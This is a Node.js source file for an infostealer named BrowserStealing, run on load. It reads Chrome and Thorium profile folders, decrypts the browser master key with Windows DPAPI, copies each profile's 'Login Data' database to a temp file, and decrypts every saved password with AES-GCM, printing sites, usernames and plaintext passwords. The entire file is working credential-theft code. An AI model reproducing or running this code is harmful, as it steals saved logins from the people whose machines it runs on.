const os = require('os'); const fs = require('fs'); const sqlite3 = require('sqlite3').verbose(); const dpapi = require('./node-dpapi'); const crypto = require('crypto') const path = require('path') class BrowserStealing { constructor() { this.browserPaths = [path.join(os.homedir(), 'AppData', 'Local', 'Google', 'Chrome', 'User Data'), path.join(os.homedir(), 'AppData', 'Local', 'Thorium', 'User Data')] this.browserProfiles = ['Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5'] this.password_command = 'SELECT action_url, username_value, password_value FROM logins'; //this.cookie_command = 'SELECT * FROM cookies'; this.tempDir = `${os.homedir()}\\AppData\\Local\\Temp`; this.tempDirCreated = `${this.tempDir}\\${Math.random().toString(36).substring(7)}`; //this.cookie_count = 0 this.password_count = 0 } generateRandomString() { const randomCharacter = () => Math.random().toString(36).substring(2, 3).toUpperCase(); return `${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}`; } async getPasswords() { fs.mkdir(this.tempDirCreated, (error) => { if (error) { console.error('Error creating temp directory:', error); return; } console.log('Temp Directory created successfully.'); for (const browserPath of this.browserPaths) { console.log(browserPath); const local_state = path.join(browserPath, 'Local State'); console.log(local_state); fs.readFile(local_state, 'utf8', (err, data) => { if (err) { console.error('Error reading local state file:', err); return; } const encrypted = Buffer.from(JSON.parse(data).os_crypt.encrypted_key, 'base64').slice(5); const decrypted = dpapi.unprotectData(Buffer.from(encrypted,"utf-8"), null, "CurrentUser"); console.log('Decryption Key:', decrypted); for (const profile of this.browserProfiles) { const password_file = path.join(browserPath, profile, 'Login Data') console.log(password_file) const decryption_file = path.join(this.tempDirCreated, this.generateRandomString()) console.log(decryption_file) fs.copyFile(password_file, decryption_file, (error) => { if (error) { console.error('Error copying login data file:', error); return; } console.log('Login data file copied successfully.'); const db = new sqlite3.Database(decryption_file, sqlite3.OPEN_READWRITE, (err) => { if (err) { console.error('Error opening login database:', err); return; } db.all(this.password_command, (err, rows) => { if (err) { console.error('Error executing login SQLite command:', err); } else { const formattedRows = rows.map(row => { if (row && row['password_value']) { let password_value = row['password_value']; let start = password_value.slice(3, 15), middle = password_value.slice(15, password_value.length - 16), end = password_value.slice(password_value.length - 16, password_value.length), decipher = crypto.createDecipheriv('aes-256-gcm', decrypted, start); decipher.setAuthTag(end); this.password_count++; return { action_url: row.action_url ? row.action_url.toString() : '', username_value: row.username_value ? row.username_value.toString() : '', password_value: decipher.update(middle, 'base64', 'utf-8') + decipher.final('utf-8').toString(), }; } else { return { action_url: '', username_value: '', password_value: '', }; } }); console.log('Password list:', formattedRows); console.log('Password count:', this.password_count); } db.close((err) => { if (err) { console.error('Error closing login database:', err); } }); }); }); }); fs.unlink(decryption_file, (error) => { if (error) { console.error('Error deleting decryption password file:', error); } else { console.log('Decryption password File deleted successfully.'); } }); } }); } }); //this.cleanUp() } //cleanUp() { // fs.rm(this.tempDirCreated, { recursive: true }, (error) => { // if (error) { // console.error('Error deleting temp directory:', error); // } else { // console.log('Temp Directory deleted successfully.'); // } // }); //} } const browserStealer = new BrowserStealing(); browserStealer.getPasswords()